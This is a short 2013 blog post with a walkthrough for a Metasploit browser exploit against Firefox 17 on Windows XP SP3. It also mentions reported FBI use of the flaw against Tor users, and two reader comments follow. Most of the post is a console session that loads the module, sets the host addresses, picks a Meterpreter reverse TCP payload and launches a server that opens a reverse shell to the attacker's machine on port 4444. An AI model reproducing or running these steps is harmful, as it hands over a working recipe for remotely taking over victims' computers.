All great things are simple, and many can be expressed in single words: freedom, justice, honor, duty, mercy, hope

Tuesday, August 13, 2013

Exploit for Firefox 17 in Windows XP sp3

Recently Mozilla Firefox 0day possibly being used by the FBI in order to identify some users using Tor for crackdown on child pornography.Now exploit is available in metasploit. Use msfupdate to get it.


Exploit target:

   Id  Name
   --  ----
   0   Firefox 17 & Firefox 21 / Windows XP SP3


msf > use exploit/windows/browser/mozilla_firefox_onreadystatechange

msf exploit(mozilla_firefox_onreadystatechange) > set LHOST 180.215.222.190
LHOST => 180.215.222.190
msf exploit(mozilla_firefox_onreadystatechange) > set SRVHOST 180.215.222.190
SRVHOST => 180.215.222.190
msf exploit(mozilla_firefox_onreadystatechange) > set uripath /
uripath => /
msf exploit(mozilla_firefox_onreadystatechange) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(mozilla_firefox_onreadystatechange) > run
[*] Exploit running as background job.

[*] Started reverse handler on 180.215.222.190:4444
[*] Using URL: http://180.215.222.190:8080/
[*] Server started.
msf exploit(mozilla_firefox_onreadystatechange) >

firefox-exploit

2 comments:

Tyler said...

This one is not working, I can never get my firefox 17 running on XP sp3 to be successfully exploited.

Nirav Desai said...

Sorry to hear that .but i think you make some mistake.Visit this link for details & view last image at that website.
https://community.rapid7.com/community/metasploit/blog/2013/08/07/heres-that-fbi-firefox-exploit-for-you-cve-2013-1690@Tyler

Post a Comment

UA-35960349-1